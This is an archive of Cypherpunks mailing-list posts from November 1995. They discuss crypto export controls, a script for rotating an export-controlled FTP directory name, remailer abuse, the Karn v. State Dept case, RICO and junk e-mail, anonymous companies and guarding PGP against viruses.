From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 21 Nov 1995 10:03:09 +0800
To: jsimmons@goblin.punk.net (Jeff Simmons)
Subject: Re: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <199511210130.RAA26710@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And as far as needing government approval, I noticed that Sameer has an
> export controlled ftp server at c2.org.  Maybe he could tell us what is
> necessary to setup such an animal. 
> 
> -- 

	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
and sed. I didn't get the NSA to approve it, but I figure if it's good
enough for RSADSI it's good enough for me.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 07:41:42 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202245.AA28548@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hmm, not sure that it gets us anywhere. The Republicans seem to be even
more keen on wiretap and anti-privacy legislation than the Democrats.
It's called "being tough on crime".

After the airplane seat incident I don't see Newt in the running for 
President so it probably misses the mark. He might slip in a rider on
a bill but if you look at who gets that sort of treatment it correlates
very well with donations, Silicon Valley seems to be backing Clinton
wallet-wise.

I would not expect Bob Dole to be resisting pressure from the NSA on this
one more forcefully than Clinton (which let us be clear ain't very
forcefully at all).

I thought the quality of writing rather poor, the points are made in 
polemic, partisan terms which can be made in non-partisan terms. If I
were Newt this letter would say to me "we will vote for you anyway", so
why should Newt bother to pander? The ad hoc ginger groups listed are
a bit odd, the authors are associated with much better known (if
fruitcake) groups.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 10:16:33 +0800
To: remailer-operators@c2.org
Subject: Re:  remailer abuse
Message-ID: <199511210154.RAA10532@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Greg Broiles <greg@ideath.goldenbear.com>
> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating.

The problem is that the time when someone complains about the remailer is
exactly when they have received some obnoxious message.  This is often
their first exposure to the idea of anonymous remailers.  Such people are
the last ones who are going to be receptive or interested in hearing a
lecture about how remailers are protecting the First Amendment.  I
generally do my best to avoid getting into a debate with these people.  I
tell them I have added them to the block list, and usually that is the
end of it.

So while I think Greg's approach is fine as part of an intellectual
debate over the pros and cons of anonymity, it does not address the most
frequent complaints I see as a remailer operator.  I hope that over time
more people will become exposed to the idea of remailers and anonymity
other than in the form of some annoying anonymous message.  Then I think
they will be better able to deal with it when they do get some problem
mail.

> The child who was the
> target of the "Mr. Pedophile" message(s) should have been taught how to use
> remailers and how to maintain his privacy on the net so that, if he really
> is the victim of some sort of random child stalker, it won't happen again.

That message was not posted to Cypherpunks.  It asked in some graphic
detail whether this boy engaged in sexual relations with his parents.
However, the mother was surprisingly calm about it, and simply asked to
be blocked.  The fact that she knew about blocking gave me the
impression she was remailer-savvy, and as I wrote above this seems to
make a big difference.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwizard@mindspring.com
Date: Tue, 21 Nov 1995 07:40:22 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
Message-ID: <199511202232.RAA28111@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:38 PM 11/20/95 -0500, Robert Hettinga wrote:
>
>My, *this* looks interesting...
>
>
>Cheers,
>Bob Hettinga
...
>Dear Mr. Speaker:
>
> We are writing to express serious concerns about the
>Administration's efforts to continue to restrict the ability
>of computer users at home and abroad to protect their personal
>and private information over electronic networks through the
>use of encryption technology. The Administration seems
...

As a constituent and campaign volunteer of Mr. Newt, I think
I will drop a hard copy of this off at his office along with a
healthy dose of *my* views !

Thanks for posting it. 

rwizard@mindspring.com
=================================================
"The Internet is already full - Go Away !"
=================================================

----Begin Geek Code---
GAT d- s+:+ a+ C++++ UH++++L++++ P+ L++ E--- W+++ N+ K- w++++ O-- M-- V
PS--- PE+++ Y++ PGP++
t+++ 5+++ X++ !R tv- b+ DI+++ D+ G-- e* h---- r+++ y++++ 
---End Geek Code---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 21 Nov 1995 08:56:30 +0800
To: hallam@w3.org
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <9511202245.AA28548@zorch.w3.org>
Message-ID: <199511210028.TAA15346@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> Hmm, not sure that it gets us anywhere. The Republicans seem to be even
> more keen on wiretap and anti-privacy legislation than the Democrats.
> It's called "being tough on crime".

Er, Newt was the one who railed against the Exon censorship bill, and
who's said in public that clipper is unrealistic.

Anyway, there is no observable difference between Republicans and
Democrats on the issue of wiretapping -- most statements that
Republicans are worse are based on wishful thinking by Democratic
sympathizers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Nov 1995 08:58:54 +0800
To: cypherpunks@toad.com
Subject: Pix Lox
Message-ID: <199511210034.TAA15743@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Bill Gates in "The Road Ahead":

      A complete failure of the information highway is worth
      worrying about. Because the system will be thoroughly
      decentralized, any single outage is unlikely to have a
      widespread effect. If an individual server fails, it
      will be replaced and restored. But the system could be
      susceptible to assault. As the system becomes more
      important, we will have to design in more redundancy.
      One area of vulnerability is the system's reliance on
      cryptography -- the mathematical locks that keep
      information safe.

   Excerpted in Newsweek, November 27, pp. 67-68.

   Rubberneck the roadwreck with Steven Levy in "Bill's New
   Vision."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 21 Nov 1995 09:27:16 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <QQzqrd08104.199511201318@tenebrous.uu.net>
Message-ID: <gs5VeD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph Malcolm <jmalcolm@alter.net> writes:
> Dimitri Vulis writes:
> >m5@dev.tivoli.com (Mike McNally) writes:
> >> Frederick B. Cohen writes:
> >>  > This is baloney.  When you work for Netscape or Sun and speak about your
> >>  > company's products, you are representing the company whether you
> >>  > disclaim it or not.
> >>
> >> Baloney.
> >
> >Fred is right. I used to work for Goldman Sachs & their internet usage policy
> >stated that when you write to Internet or Usenet from a GS account, it will
> >reflect on the firm no matter how you disclaim it.
>
> Dr. Cohen is I believe maintaining it doesn't matter where you write
> from. Note that the Sun employee's message that sparked this was sent
> from a Netcom account.

If that's what Dr. Fred said, then I strongly disagree. (Sorry, I haven't
been following what Dr. Fred said very closely. Can you blame me? :)

Btw, Goldman has a very reasonable Internet use policy that encourages
employees to get accounts on commercial internet providers.

Btw^2, didn't Sun fire someone a couple of years ago for posting a homophobic
joke to Usenet?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 12:55:56 +0800
To: cypherpunks@toad.com
Subject: Cyberpunk handbook
Message-ID: <199511210436.UAA26114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


You Bay Area people probably know all about this already, but I was
browsing through the local bookstore yesterday and saw Eric Hughes,
Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
a slim satirical volume by the Mondo 2000 people.  The book has more
attitude than information, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 21 Nov 1995 11:28:25 +0800
To: cypherpunks@toad.com
Subject: Happy Thanksgiving L. Detweiller!
Message-ID: <199511210254.TAA12709@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


And to all of your tentacles,

And to all of you on The Cypherpunk List.

Love Always,

Carol Anne
ps Is that L for Laura or Lori?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Tue, 21 Nov 1995 22:32:03 +0800
To: privacy@vortex.com
Subject: Applied Cryptography case filings on the Web
Message-ID: <199511210500.VAA01678@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


The government has filed its Motion to Dismiss, or In The Alternative,
For Summary Judgment in the case of Karn vs State Dept. This case
challenges the arbitrary Commodity Jurisdiction Request rulings
made for the book Applied Cryptography and for a floppy disk containing
the same source code printed in the book.

I've begun scanning in and HTMLizing the various government documents,
some of which are sizeable. As I finish them I'm putting them up on
my web page. Please feel free to pass around this URL:

http://www.qualcomm.com/people/pkarn/export/index.html

--Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 21 Nov 1995 04:45:51 +0800
To: cypherpunks@toad.com
Subject: Spam the Sign!
Message-ID: <199511202020.VAA01688@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On September 27, Jeff Weinstein of Netscape (and others) wrote:

> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> > 
> > We are working this issue with the government.  As soon as we can
> > make it available for download we will.

> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

>>  Where did I imply that if the govt. ignored us or said no that we
>>  would meekly go away with tail between legs?

Netscape has a cute little Times Square scrolling sign in their engineering
dept. - you can leave a message for all to see at:

	www.netscape.com/people/mtoy/sign/index.html

Drop by and ask Jeff where his tail is these days. };->




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Tue, 21 Nov 1995 03:46:57 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <pnr747988188m@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>, s1113645@tesla.cc.uottawa.ca said:
> On Sat, 18 Nov 1995, David Murray wrote:
> 
> > unincorporated, or deed of settlement, company.
> 
...
 
> Barring escrow services, I don't see how contracts (or a lot of 
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like 
> a storefront and merchandise. But then these are easily linkable to True 
> Names, unlike software companies, financial services or any other part of 
> the info economy.)

But the assets of the company are held by (known) trustees and exposed to
judgment - the pseudonymous part just means that _only_ those assets are
exposed.

For instance, an enterprising cypherpunk decides it would be a good thing
to run a restaurant with a crypto-anarchy theme (cajun style Blacknet burgers,
anonymous avocado salad, Phil Zimmerman celebrity cocktail...). Unaccountably,
a thousand other cypherpunks decide to invest $100 each. More understandably,
they don't want it to be known that they invested. By buying shares in an
unincorporated company pseudonymously (including anonymously) they can risk
$100, but $100 only. The money is (initially) held in the trustee's bank
account (having been subscribed in ecash), so the cheques for the tables and
chairs won't bounce. The chairs, tables, kitchen equipment, lease etc will
also be held by the trustee on trust for the partnership/company, and will
be available for creditors should the partnership not meet its obligations.

So doing business with an unincorporated company is very much like doing
business with an incorporated company/corporation. (I can see that audited
accounts, for instance, could be useful in attracting investors/reassuring
creditors.)

Note that the argument works just as well for intangible assets - even digital
assets - as for tangible ones like tables. So our enterprising cypherpunk
might well have started a bank, insurance company or mutual fund (except for
all the other regulatory hassles :-)
  
> Besides, if companies in general can set up other companies, in a 
> trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
> do the same in the present system and therefore make it very hard to know 
> if any company in any country is non-anon?

Yes. But you have to have your base anon corporation to be the penultimate
stockholder of the other corporations. And it can be expensive - perhaps too
expensive to be worth the gain in anonymity. There is also the matter of having
to have human directors with revealed True Names in most non-anon and
"trustworthy" jurisdictions.

There are other ways to anonymise corporations - I presented a proposal to the
list about a year ago that simply interposed a unit-like trust as sole (legal)
shareholder of the corporation, the "units" in the trust mirroring the shares
but being held anonymously.

Any of these structures can/might be useful. What I like about unincorporated
companies, however, is the way they rely only on the common law and equity,
and bypass statute - enabling, perhaps, less reliance upon the law of any
particular State.

> I'm not completely sure I understood your explanation of a 
> deed-of-settlement corp. and the idea of an "unincorporated" company. 
                     ^^^^^
Not "corporation", "company", as in collective noun :-) An incorporated company
is a corporation, but in general, company ~= corporation. It is just that for
well over a hundred years there have not been any companies that have _not_
been incorporated, except dance companies, infantry companies etc.
   
> (Unincorporated in what way, and what were the registration and ID 
> requirements?)

Unincorporated in every way :-) Which is to say, not a separate legal entity
but a partnership (of shareholders) coupled with a trust of the partnership
assets.

And because it relies only on partnership/agency/contract law and the law of
trusts, there were no registration or ID requirements, just as there are no
registration or ID requirements for forming a partnership or trust now.
 
(Compare, for instance, the requirement on NZ incorporated companies to keep
public records of the name and [in the case of natural persons, residential]
address of everyone who has been a shareholder in the last ten years.)

> Any references? Thanks.

A lot of Corporate/Company law books have some coverage of this stuff in their
historical chapters - try English or Australian texts (Gower is quite good).
Legal history texts also often have something. Du Bois published a book (in
the 1940's ?) that seems to be cited for all manner of minutiae - it has
something about the Bubble Act in its (long) title. [If you find this book,
how about sending me a summary :-) Chapter III is probably most useful.] And
J. Reeder "Corporate Loan Financing in the 17th and 18th Centuries" (1973)
2 Anglo-American Law Review 487 is supposed to have something about bond issues
by unincorporated companies (or is it bank lending?).

Cheers,

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLBKhllo3j8JHzalAQF/PQP7BWH7JGNNazI2ehSpOldEysa+FZbirHLs
hkbqOIFDJzBXtQ3lyiA1lZydMdDTxpNAF0oGveNosX6Sw3l23Hu/j+EGg7hOGLq3
IVchirf24/puj6HWwQbD9LlMB1SARNKkwG+0NI6saYz/z0JVHdtw7c6/dvoxcVZX
M/T8qjWddqs=
=wLPd
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 15:58:31 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
Message-ID: <199511210731.XAA08374@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995, Dr. Dimitri Vulis wrote:

> m5@dev.tivoli.com (Mike McNally) writes:
> > Frederick B. Cohen writes:
> >  > This is baloney.  When you work for Netscape or Sun and speak about
> >  > your company's products, you are representing the company whether you
> >  > disclaim it or not.
> >
> > Baloney.
>
> Fred is right. I used to work for Goldman Sachs & their internet usage
> policy stated that when you write to Internet or Usenet from a GS account,
> it will reflect on the firm no matter how you disclaim it.

I think this is true, and is where we start to get into reputations and
trust. 

If someone from Goldman Sachs posts to a Usenet group discussing abortion
or gun-control, and says that: "These opinions are my own and not my
employers."  Then, we can accept that, no matter how silly their opinions
are. 

But there is a difference in the way we look at it if someone from Goldman
Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
safer and produces higher returns because Goldman uses cubic spline
interpolation methodologies to interpolate the yield curve, while Merrill
Lynch doesn't.  There is a difference here. 

In the first case, the poster is not commenting about anything to do with
their work, -- it really is just one man's opinion -- while in the second
they are actually commenting upon something their employer is selling. 

If the employee tries to add, "these opinions are my own, and do not
reflect the opinion of my employer" then we have a huge credibility
problem. 

You really can't have it both ways.  You can't post officially and
unofficially at the same time, unless it really does have nothing to do
with your work. 

If you post from Sun Engineering, and you are posting to a group that
focuses on Sun, and you are talking about a Sun product, then people are
going to take your comments as an official statement from Sun. You are
that product's spokesperson, whether you disclaim or not, and should act
accordingly.  No matter what, that's the way people are going to see it. 

It's a huge responsibility ... it's not like speaking candidly at an open
Member's table at the Rideau Club or anything, like that. 

Sun and Netscape and AT&T should know this.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 16:00:58 +0800
To: Thomas E Zerucha <zerucha@shell.portal.com>
Subject: Re: Virus attacks on PGP
Message-ID: <199511210732.XAA04912@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:52 11/20/95 -0800, Thomas E Zerucha wrote:
>... The code can also be cross compiled 
>and burned onto a CDROM which would make it difficult to infect.

Certainly having PGP run from a CDROM or other read-only device would be a
big help.  Even better would be to have all the privileged code also run
from a read-only device.


Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 21 Nov 1995 13:03:11 +0800
To: cypherpunks@toad.com
Subject: Export control FTP servers
Message-ID: <9511210441.AA26515@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
>and sed. I didn't get the NSA to approve it, but I figure if it's good
>enough for RSADSI it's good enough for me.

I believe some of the following has been posted here before.
The person to speak with is
	John Sonderman
	Office of Defense Trade
	Department of Compliance
	703 875 6644
He's supposed to be Internet-aware.   What's not common knowledge is
that he's leaving by early December for budgetary reasons.  If you're
thinking of putting export controlled stuff up for FTP, you should
probably contact John now.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 21 Nov 1995 17:28:37 +0800
To: attila@primenet.com (attila)
Subject: Re: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <199511210906.BAA04152@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


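#!/bin/sh
# Run from cron: rename the US-only directory to a fresh name and update
# README.US-only, which contains the current name.
umask 022
# Name suffix currently in use, saved by the previous run.
DIRNAME=`cat "$HOME/.usonlydir"`
# New suffix: MD5 of the output of the local pseudo-random program.
NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
# Stop if the directory is missing, so mv never runs in the wrong place.
cd /u1/ftp/pub/US-only || exit 1
mv "I_will_not_export_$DIRNAME" "I_will_not_export_$NEWDIRNAME" || exit 1
cd ..
# Replace the old name with the new one in the README.
sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
mv README.new README.US-only
# Remember the new suffix for the next run.
echo "$NEWDIRNAME" > "$HOME/.usonlydir"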


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 19:48:10 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511210955.BAA16150@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 Nov 1995 hallam@w3.org wrote:


> I think it would be better to slap a RICO suit onto the company
> concerned. It sound to me like an attempt to gain financial advantage
> through threatening behaviour. Where I come from that means jail time. 

RICO is very serious stuff.  Criminal prosecution under the terms of the
Racketeer-Influenced & Corrupt Organizations Act is reserved for very
serious situations indeed.  It's true "rubber hose" stuff. 

It was intended as a tool for use against mobsters, but US attorneys have
used it against white-collar criminals.  I think, you'd have to have
strong evidence of an ongoing "criminal enterprise", which I don't think
you have with junk e-mail. 

I doubt that there are many experts in RICO as it applies to computer law. 

I really don't know if the laws pertaining to breaches of computer
security would be applicable, or not, or how RICO really does work or fit. 
Although the armchair solicitor in me might speculate that you'd have to
show some form of organized collusion or somesuch to breach computer or
network integrity to prosecute under RICO.  And you'd have to show -- I'm
uncertain if the standard is beyond a reasonable doubt or not -- that it
was at some point willful and well-organized. 

I suppose that is a moot point though, when we're talking about pre-trial
forfeiture of all assets -- right down to the food in the refrigerator.  I
doubt at that point that a trial would be forthcoming.  It really does
reinforce the maxim, that it's best not to fight a battle that you cannot
win.  

RICO is very persuasive that way. 

I'm certain that there will be those who would say that it's not
administratively possible to apply RICO to this situation.  Most legal
advisers would probably say that it can't be done, but I suppose then,
that would be the time for the clarion call, "Then get me a lawyer who
says it CAN be done." 

Personally, however, I'm unconvinced, and would defer to those much more
knowledgeable in such matters.

Although, in all honesty, RICO and computer networks in the same sentence
literally scares the be-jeebers outta me. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 21 Nov 1995 11:13:26 +0800
To: cypherpunks@toad.com
Subject: Detweiler and his theory of "Budding Nazism"
In-Reply-To: <199511202005.MAA25006@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951121015310.16797A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



 It probably is not worth the aggravation, but ignorant, both politically and 
as to the charter of cypherpunks, assholes like Detweiler need to be set 
straight.  Since I doubt Detweiler is open to discussion --small minds 
rarely are, we might _very_ politely suggest to the editors of Time, NYT, 
and a couple others that Detweiler is not only misinformed, but that he 
is not open to discussion.  Enough _polite_ letters to the editors can do 
wonders.
________________________________________________________________________
On Mon, 20 Nov 1995, Hroller Anonymous Remailer wrote:

> The other anonymous poster was referring to Detweiler's
> belief that cryptoanarchy was a budding Nazism as one
> of his apparent motivations. After a little bit of 
> amateur Detweiler study I can agree with this. 
> 
> His page at http://www.csn.net/~ldetweil/ has sections that
> emphasize his concern about cryptoanarchy as a kind of
> "neo-nazism". Thankfully the cryptoanarchist sentiments
> on this list are much different than nazism in the way
> it advocates complete disengagement from the political
> process, something that tended to make the Nazist agenda
> highly dangerous. Without that you just have a bunch of
> subversive guerillas. Like gnats, irritating but irrelevant.
> 
> So as long as we stick with the non-political advocation,
> and stay disorganized, and don't ever amount to anything
> significant as far as visible political clout, I think
> Detweiler is generally going to continue to leave us alone,
> thank God.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 21 Nov 1995 20:46:35 +0800
To: ahupp@primenet.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511180319.UAA07399@usr5.primenet.com>
Message-ID: <199511210110.CAA00878@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> PKZIP allows encryption (other's ?).  How about a hook to that?

PKZIP "encryption" is self-deception.  A program for cracking it,
PKCRACK, is widely available on the internet.  See e.g.
ftp.funet.fi:/pub/crypt/analysis.  

[For information about internationally available cryptographic
software, see http://www.cs.hut.fi/crypto.]

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 20:41:06 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511211219.EAA10354@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Rich Salz wrote:

> >RICO is very serious stuff.  Criminal prosecution under the terms of the
> 
> Like Operation Rescue?

My apologies, I'm sorry but I don't understand this reference.  What does
Operation Rescue have to do with the seriousness of RICO?  What is
Operation Rescue? 

I am definitely not an expert on foreign statute.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 Nov 1995 22:27:43 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <199511211405.GAA17363@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Wed, 8 Nov 1995, Daniel R. Oelke,
 <droelke@aud.alcatel.com> wrote:

> > Now we're getting specific. These are things that us ordinary folk can do
> > which show the 'leaders' how to follow. What software, hardware,
> > applications, support and sysadmin experience is required and where is it
> > available on what terms. What are the cash flow opportunities to support
> > such services? 

By "cash flow-opportunities", is this the "opportunity-cost" of providing
services??  The foregone profits of today.  Or is this the future cash
flow opportunities which could arise from this type of activity.  The
future assets of tomorrow? 

Essentially, doesn't all of this reduce to "valuing" in present dollar
terms (i.e.  attaching a discounted present value through some appropriate
hurdle rate) to some level of future benefit. 

The real issue as I see it, is finding some way to actually "fund" that 
hazy discounted present value.

> A good service would be to provide and support distribution of 
> privacy enhancing tools to universities and companies that
> want them.  i.e. have people who will help set up firewalls,
> PGP, encrypted telnet (pick your flavor), etc. 

As long as it of course *obviously* excludes product like Netscape
Navigator -- the black-box code with significant security holes and flaws --
I'd have to agree that this is in fact a very good idea.

But it requires forward-thinking.  It's no different actually than paying 
someone for what they know, rather than paying them for what they do.

> Yes - I know that most of this stuff is out there already,
> but having people *willing* to integrate it for you without
> charging an arm and a leg would go a long way towards convincing the
> suits that this is a *good* thing.  

It sounds good on the surface.  In fact the liaison officer / integrator
might even establish some valuable "working relationships".  I think that
this form of thinking is what will define who will be long term players in
this industry -- and who won't.  

Those who are able to build "goodwill" will survive and flourish, while
the others will flounder. 

If I may paraphrase, I believe that Dan is speaking possibly of
loss-leader services.  Services which do not in actuality show presently
as "high value-added" under our antiquated systems of accounting and
measurement.  Services which might in fact reduce short-term "profits"
because they are "current-expensed" rather than being recognized as the
deferred assets, they in fact truly are. 

(Essentially, the same problem we've visited with R&D expenses.  The
problem where the "solution" is defined as cutting R&D expense, so that
there is increased "profit", although long-term health and corporate
competitiveness is actually weakened.  A true management accounting
paradox.)

There should be a re-focus onto a horizon that is somewhat longer than the
current quarter.  Or the current day, for that matter, or the current
moment.  Unfortunately, these types of "forward-thinking" plans and
projects all require current funds.  Money.  And lots of it, before they
start showing and generating "measurable" returns.  It really is the
laying and strengthening of foundations. 

And who has the authority to spend any money on "wasteful" foundations??

If no one funds these types of projects, either jointly or individually, 
then these projects and bright ideas invariably go absolutely nowhere.


> Dan
> ------------------------------------------------------------------
> Dan Oelke                                  Alcatel Network Systems
> droelke@aud.alcatel.com                             Richardson, TX



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 21 Nov 1995 19:34:37 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <9511211114.AA26914@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>RICO is very serious stuff.  Criminal prosecution under the terms of the

Like Operation Rescue?

Wrong again, Alice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 21 Nov 1995 21:51:32 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511210732.XAA04912@netcom18.netcom.com>
Message-ID: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Certainly having PGP run from a CDROM or other read-only device would be a
> big help.  Even better would be to have all the privileged code also run
> from a read-only device.

Seeing as PGP is quite small the simplest and cheapest read-only device
would be a write-protected floppy disk.

Could a virus write to a write-protected disk?  I'm not sure if the
protection is done in the BIOS or the drive hardware.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 21 Nov 1995 23:21:03 +0800
To: rsalz@osf.org
Subject: Re: Get your own ITAR
Message-ID: <9511211457.AA03654@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



I just called this number and was given the following instructions:
Fax your request to (703)875-6647 Attn Donna Davis, include your name 
and address. Allow 10-15 days for US mail or include your Fed-Ex 
account number for faster service.

